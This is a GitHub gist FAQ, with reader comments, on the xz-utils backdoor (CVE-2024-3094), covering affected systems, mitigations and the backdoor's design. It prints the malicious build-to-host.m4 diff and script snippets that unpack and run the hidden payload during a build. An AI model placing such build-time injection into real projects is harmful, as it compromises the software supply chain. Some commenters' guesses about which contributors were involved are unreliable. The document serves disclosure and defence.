@thesamesam
Last active December 21, 2024 19:38
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in it is written in good faith and to the best of our knowledge, but we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that provides lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; a typical Linux or macOS system will have it installed.

This backdoor is very indirect and only shows up when a few specific criteria are met. Others may yet be discovered! However, the backdoor can at least be triggered by remote unprivileged systems connecting to public SSH ports. It has been seen in the wild being activated by incoming connections, resulting in performance issues, but we do not yet know what is required to bypass authentication (etc.) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.
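
The version condition above can be sketched as a small shell check. This is a minimal sketch, not an official detection tool: the function name is hypothetical, and it compares against the upstream version only. Distro package versions often carry extra suffixes, so extract the upstream part from your package manager's output before passing it in.

```shell
# Hypothetical helper: succeeds (exit status 0) only for the two upstream
# releases named above, 5.6.0 and 5.6.1.
is_affected_xz_version() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Placeholder value; substitute the upstream version your system reports.
installed="5.4.6"
if is_affected_xz_version "$installed"; then
    echo "xz $installed: known-bad release, update now"
else
    echo "xz $installed: not one of the known-bad releases"
fi
```

An exact match is used on purpose: a prefix match could misfire on packaging schemes that embed an older upstream version inside a higher-looking version string.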

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

Without wanting to scaremonger, it is important to be clear that, at this stage, we got lucky, and the infected liblzma may well have other effects.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc; that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally, upstream publishes release tarballs that differ from the ones GitHub generates automatically. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.
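
A rough way to see this kind of divergence for any project is to list the files that exist only in the release tarball. The following is a minimal sketch, assuming the tarball has been unpacked into one directory and the matching git tag checked out into another; the function name and both directory arguments are hypothetical.

```shell
# Hypothetical helper: print files present in an unpacked release tarball
# ($1) that are absent from a checkout of the matching git tag ($2).
files_only_in_tarball() {
    tarball_dir=$1
    git_dir=$2
    tmp_a=$(mktemp) || return 1
    tmp_b=$(mktemp) || { rm -f "$tmp_a"; return 1; }
    # Relative file lists, sorted bytewise so comm can compare them.
    (cd "$tarball_dir" && find . -type f | LC_ALL=C sort) > "$tmp_a"
    (cd "$git_dir" && find . -type f ! -path './.git/*' | LC_ALL=C sort) > "$tmp_b"
    # comm -23 keeps only the lines unique to the first list.
    LC_ALL=C comm -23 "$tmp_a" "$tmp_b"
    rm -f "$tmp_a" "$tmp_b"
}
```

The output is a review list, not a verdict: autotools release tarballs legitimately ship generated files that are not in git. Files that exist in both trees but differ in content need a separate comparison, for example with diff -r.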

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)
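
The two patterns can be tried in isolation on a few build triplets. This is only a sketch of the pattern tests themselves, not of the malicious script's control flow; the helper names and the sample triplets are assumptions chosen for illustration.

```shell
# Hypothetical helpers wrapping the two grep patterns from the snippet.
is_x86_64_build()    { echo "$1" | grep -Eq '^x86_64'; }
is_linux_gnu_build() { echo "$1" | grep -Eq 'linux-gnu$'; }

# Sample triplets (illustrative values, not taken from the payload).
for triplet in x86_64-pc-linux-gnu aarch64-unknown-linux-gnu x86_64-pc-linux-musl; do
    if is_x86_64_build "$triplet" && is_linux_gnu_build "$triplet"; then
        echo "$triplet: matches both patterns"
    else
        echo "$triplet: does not match both patterns"
    fi
done
```

Only the first triplet matches both: the second fails the architecture pattern and the third does not end in linux-gnu.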

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
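
Two of the added lines in the diff are easy to try on harmless data. The sketch below reuses the grep expression from gl_BUILD_TO_HOST_INIT and the tr mapping stored in gl_path_map; the function names are hypothetical, and the tr call relies on tr treating "\-" as a literal dash, as GNU tr does.

```shell
# Hypothetical helper: list files under directory $1 containing a line that
# ends in four '#', five alphanumerics, four '#'. Flags as in the diff:
# -a treat binary files as text, -E extended regex, -r recurse,
# -l print file names only, -s suppress file error messages.
find_marker_files() {
    grep -aErls '#{4}[[:alnum:]]{5}#{4}$' "$1" 2>/dev/null
}

# The byte mapping from gl_path_map: tab <-> space and '-' <-> '_'.
swap_bytes() {
    tr "\t \-_" " \t_\-"
}

printf 'a-b_c\n' | swap_bytes    # prints a_b-c
```

Because the mapping swaps each pair of bytes, applying swap_bytes twice returns the original input. Running find_marker_files over a source tree is one cheap way to look for files carrying this kind of marker.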

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because other parts of libsystemd depend on it. This is not the fault of systemd; it is simply unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).
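
Whether liblzma ends up in the sshd process at all can be checked from the dynamic linker's view of the binary. The following is a minimal sketch that scans ldd-style output for liblzma; the helper name is hypothetical and the sample lines are made up to show the shape of the output, not copied from a real system.

```shell
# Hypothetical helper: reads ldd-style output on stdin and succeeds if any
# line names liblzma.
mentions_liblzma() {
    grep -q 'liblzma\.so'
}

# Made-up sample in the shape ldd prints; paths and addresses are
# illustrative only.
sample='	libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0 (0x00007f0000000000)
	liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f0000100000)'

if printf '%s\n' "$sample" | mentions_liblzma; then
    echo "liblzma would be mapped into this process"
fi
```

On a real system the input would come from something like ldd on the sshd binary. Note that the ldd manual page warns against running it on untrusted executables, so only do that for binaries installed by your distribution.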

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a stray '.' character in the CMake check for landlock sandboxing support. This caused the check to always fail, so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse began the long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns that some other projects are affected (either by themselves, or because changes to them were made to facilitate the xz backdoor). I want to avoid a witch-hunt, but I am listing some examples here which have already been linked widely, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@AdrianBunk

@smintrh78 I've responded there why your suggestion implies that you don't understand the problem.

@teyhouse

I did some testing regarding detecting the CVE inside container images. As of right now, it seems the default container Scan from Trivy does not yet detect CVE-2024-3094, but grype does. I would recommend checking on SBOM-Base, for example:
https://github.com/teyhouse/CVE-2024-3094/blob/main/check_sbom.sh


@Sepero

Sepero commented Mar 31, 2024

If instead of obfuscated code, imagine if the attacker did things a little smarter? Like perhaps an "accidental" buffer overflow (or other memory based exploit)...

@FrankHB

FrankHB commented Mar 31, 2024

kill the autotools, use meson (the philosophy of meson is: only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.
This also prevents vendor lock-in. Consider when you have a compromised meson...

Dear god, what're you trying to do? Make linux unusable? We have gentoo for this which, by the way, was also affected by this XZ backdoor. "Make every distro compiled..."

You seem to forget not everyone has a top of the line CPU. God forbid you like google chrome or any proprietary software...

This has nothing to do with Linux itself, as this can be a pure userland thing, and I don't say it should prevent you from specifying any "source" in the form of precompiled binaries (including the kernel image) once you are already confident enough.

The key point is to make sure each piece of binary code (except code locally developed by users) is derived entirely from some really auditable source which is actually used by the system, rather than just some random source packages separately maintained by the upstream repo admins.

This is not far from the spirit of meson mentioned here. It is just a strategy enforced in the whole system by default.

Gentoo is not that unusable if the binary cache is effectively shared. A more significant problem is that it seems so unfriendly to the carbon footprint in any serious configuration... It is certainly a nonstarter for most users lacking the knowledge about what happens under the hood (esp. to distinguish which parts of the building during the installation are actually totally redundant).

To share the cache efficiently, you have to share the configurations to precisely reproduce the builds of almost any piece of software in the system. Unfortunately, most binary distros lack the mechanism to handle such things systematically. To the best of my knowledge, nix and guix are among the few to get such things virtually right at the base (purely functional configuration versioning), but they are still too far from most industrial users.

This also won't automatically solve the problems of inefficient build system, though.

@wtznc

wtznc commented Mar 31, 2024

GitHub has just restored access to his account. There may be many more repositories where malicious code can be found - e.g. llvm compiler llvm/llvm-project#63957

@SyntaxDreamer

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd
@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

An infected host, regardless of where or how it is running, affects everyone equally. DoS attacks, spam, relays, etc. Does it matter if it's running under Windows WSL, a VM or docker? No, it does not.

@Leseratte10

GitHub has just restored access to his account.

Doesn't look like it. "JiaT75" is still suspended.

@NuLL3rr0r

Somebody created this single page analysis on Twitter.

Also this gist is very interesting.

@Leseratte10

Leseratte10 commented Mar 31, 2024

You're looking in the wrong place. Just because you can see the profile doesn't mean the user isn't suspended


@thimslugga

GitHub has just restored access to his account. There may be many more repositories where malicious code can be found - e.g. llvm compiler llvm/llvm-project#63957

Perfect, now they can return back to doing their part as a little “helper elf”. Lol, perhaps a very subtle cue to what they had on their mind.

Just trying to do my part as a helper elf!

Jia Tan

https://www.mail-archive.com/xz-devel@tukaani.org/msg00518.html

@wtznc

wtznc commented Mar 31, 2024

This situation made me wonder how many other such libraries are developed by (mostly) one person and end up in most Linux distributions, but the author is not actively involved in their development. This is a potential vector for further attacks. I am very curious about the social aspect - how this relationship and trust was built between the authors.

@Fearyncess

Fearyncess commented Mar 31, 2024

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

@Z-nonymous I'm not sure what your point is there... xry111 just misunderstood whatever the OpenSSL procedure is. t8m and slontis are both well-known, longstanding members of the OpenSSL team.

Just asking if they really reviewed. for side effects

I don't say they submit faulty code; they might sometimes, in good faith, wrongly approve stuff from a bad actor that ends up having side effects. That's why I noted the pure issue. Maybe they really want to push Loongson arch support and are being played.

xry111 and xen0n are both maintainers of some of the loong ports in the kernel/toolchain and I'm not surprised they show up to review other changes to core packages where the changes are specific to loong...

I'm making correlations, asking advice. i.e. liblzma_la-crc64-fast.o is the backdoor as per https://gynvael.coldwind.pl/?id=782 and xry111 also committed LoongArch CRC code in xz, approved by JiaT75 in tukaani-project/xz#86

, loong isn't exactly a big target.

Well, I need to investigate further; there have been reviews from them in many code/function modules that are in the analysis from the thread in https://www.openwall.com/lists/oss-security/2024/03/29/4 and that have been modified for LoongArch in some form. The breadth of areas they are contributing to (comments, reviews, approvals, PRs) in that team is everywhere: compilation, system services, ssl, crypto, kernel, localization, html, assembly, c, rust, node, nvm, dosbox.

They can't potentially know every possible implications of updates in such a large code base.

Again: I don't say they submit faulty code; they might sometimes, in good faith, wrongly approve stuff from a bad actor that ends up having side effects they don't apprehend. I will review make-ca but maybe there are places

In any case, to me, this looks a bit like a witch-hunt against two people who are Chinese.

Do you know these people IRL ? Do you know the people they approve the PRs of ? How do you know any GH user is Chinese ? Only real police/federal/interpol investigation can determine that. Even then sometimes they could arrest someone who happened to have found a usb key in Latvia instead of a Russian agent.

I've worked with many Chinese colleagues in research & engineering, they are as brilliant minds as anyone. I never implied anything Chinese-related, maybe my fault was trying to explain that Loongson is a Chinese CPU manufacturer for context. I never even said they were actually from that company. I just assumed they implement support for it.

They might be played by people complaining about bad Loongson support, providing engineered reports, forcing them to make changes whose side effects they don't always understand.

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

By your words, a "25-year Unix commercial TALENT" smells in this thread like a JiaT75's partner, even himself. Because you are spreading misinformation and trying to slander the other person, that also can be a part of THIS APT. Don't you think so?

@Carnildo

If instead of obfuscated code, imagine if the attacker did things a little smarter? Like perhaps an "accidental" buffer overflow (or other memory based exploit)...

Truly accidental buffer overflows are so common that most systems have protections against them. The days of simply dropping shellcode on the stack are long gone.

@imelon123

I am not familiar with coding, but on 2024-02-12, the commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin. Is it expected?

commit e0c0ee475c0800c08291ae45e0d66aa00d5ce604
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

...

commit de5c5e417645ad8906ef914bc059d08c1462fc29
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit e446ab7a18abfde18f8d1cf02a914df72b1370e3
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit 7f6d9ca329ff3e01d4b0be7366eb4f5c93da41b9
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

https://raw.githubusercontent.com/freebsd/freebsd-src/ee36e7faceafeef05c5e81654a1d8ec11d314894/contrib/xz/ChangeLog

@ItzSwirlz

I am not familiar with coding, but on 2024-02-12, the commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin. Is it expected?

commit e0c0ee475c0800c08291ae45e0d66aa00d5ce604
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

...

commit de5c5e417645ad8906ef914bc059d08c1462fc29
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit e446ab7a18abfde18f8d1cf02a914df72b1370e3
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit 7f6d9ca329ff3e01d4b0be7366eb4f5c93da41b9
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

https://raw.githubusercontent.com/freebsd/freebsd-src/ee36e7faceafeef05c5e81654a1d8ec11d314894/contrib/xz/ChangeLog

Probably modifying and tampering with git commits manually

@thesamesam
Author

Just keep in mind that this is kind of normal when applying someone else's commits via rebase or git am, especially if patches got emailed or similar. Not saying that is what happened here but it's not super abnormal either.

@crrodriguez

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

Edit: and in particular, does IFUNC have the potential to reduce security by design?

ifunc is an ELF feature that is used to select target-specific optimizations in glibc, in order to pick the fastest routine for your hardware of basic functions, for example memcpy , all the math routines ..all from a single library and not dozens or hundreds of different builds to target all user hardware.
some basic explanation here https://jasoncc.github.io/gnu_gcc_glibc/gnu-ifunc.html

@thesamesam
Author

IFUNC was probably not worth using here and Lasse wasn't really in love with it as he felt it was a lot of complexity, but it isn't useless or anything in general either. But I must admit I did not say it should be removed or anything like that.

@w-flo

w-flo commented Apr 1, 2024

commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin

Looking at the repo, e.g. here, all 4 commits were committed by Lasse Collin at the same time on Feb 14. He probably received 2 of these commits from Jia Tan (maybe through a pull request) and reset the date for all 4 commits, maybe after rebasing to solve merge conflicts, two days before committing them all at the same time. I'd say that's not suspicious.

@imelon123

imelon123 commented Apr 1, 2024

@thesamesam Is this a known issue, and can it be reproduced? Given that the timestamps (and timezones) are exactly the same, the only explanation is that they were triggered by the same person. Since it occurred in February 2024, just a few days before the backdoor was installed, it is probably worth being alerted.

In almost all commit logs, Jia Tan uses the +800 timezone, except for the one above and the following one:

commit 86118ea320f867e09e98a8682cc08cbbdfd640e2
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 23:38:32 +0800					--> +800	Jia Tan		2023-06-27 23:38:32 +0800 (18:38:32 +0300)

    Update THANKS.

 THANKS | 1 +
 1 file changed, 1 insertion(+)

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

commit b4cf7a2822e8d30eb2b12a1a07fd04383b10ade3
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2023-06-27 17:24:49 +0300					--> +300	Lasse Collin	2023-06-27 17:24:49 +0300

He switched between the +300 and +800 timezones?

Note that in this case, the timestamps were not the same, so they were unlikely triggered by the same command or commit.

@AdrianBunk

@thesamesam
https://bugs.debian.org/1067708
https://git.tukaani.org/?p=xz.git;a=commit;h=ee44863ae88e377a5df10db007ba9bfadde3d314

"Hans Jansen" seems to be another alias of "Jia Tan" (or the alias of a different member of the attacker team).

@xry111

xry111 commented Apr 1, 2024

If you apply a patch sent to you by another person (or maybe not a person, whatever) with patch -Np1 and then git commit --author=..., the timestamp (including time zone) will be your own.

I'd always use git am instead, but AFAIK some people do not. (Edit: and git am is somehow more strict than patch -Np1, so if git am fails but patch -Np1 works people may just commit it with git commit --author=... after visually inspecting the change anyway.)

@thesamesam
Author

@x1done b4cf7a2822e8d30eb2b12a1a07fd04383b10ade3 looks OK to me in terms of content. I have a clone from a fair while ago and I don't think any force pushes occurred.

I suspect Lasse applied those and just ended up mangling the timestamps (others have mentioned some scenarios about how it could happen with git am), but it might be worth asking him (once the important stuff is dealt with). Not everyone is super comfortable with git branches so it might be that he exported his own changes and reapplied them later, or similar.

@thesamesam
Author

thesamesam commented Apr 1, 2024

@AdrianBunk Thanks. I will reflect on if this should be included. It's hard because I do not want to encourage a witch hunt and it's mentioned in some references I included. If you have a suggestion for how I could include it without it sounding accusatory, then that would be helpful.

EDIT: Maybe I could mention it in the context of when the IFUNC stuff got introduced.

@AdrianBunk

Is this a known issue, and can it be reproduced? Given that the timestamps (and timezones) are exactly the same, the only explanation is that they were triggered by the same person.

@x1done Some batch action was done by the same person (Lasse).

You can reproduce the effect in many ways, for example with:

git format-patch -2
git reset --hard HEAD^^
git am --ignore-date 000*

From looking at the (untampered) autoconf code I got the impression that Lasse is (like me) someone who was already developing software in the 1990s, many years before git was written. People who started coding before git existed often have some pre-git habits in their workflows since you usually don't change everything when starting to use a new tool, it wouldn't shock me if what happened for example included such an export to patches and then re-import to git.

@thesamesam
Author

@AdrianBunk This matches my understanding on all parts.

@imelon123

imelon123 commented Apr 1, 2024

@thesamesam To be honest, here I'm not really interested in what was committed, but rather about the timezone and timestamps, especially the following one:

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

I don't think it was a commit triggered from account 'Lasse Collin', as there were no other events at the same timestamp. In that case, it should be from account Jia Tan itself. This raises the question, why did Jia Tan change his timezone to +300?

@thesamesam
Author

thesamesam commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer). It's been covered how the time might change to Lasse's when applying a patch from someone else.

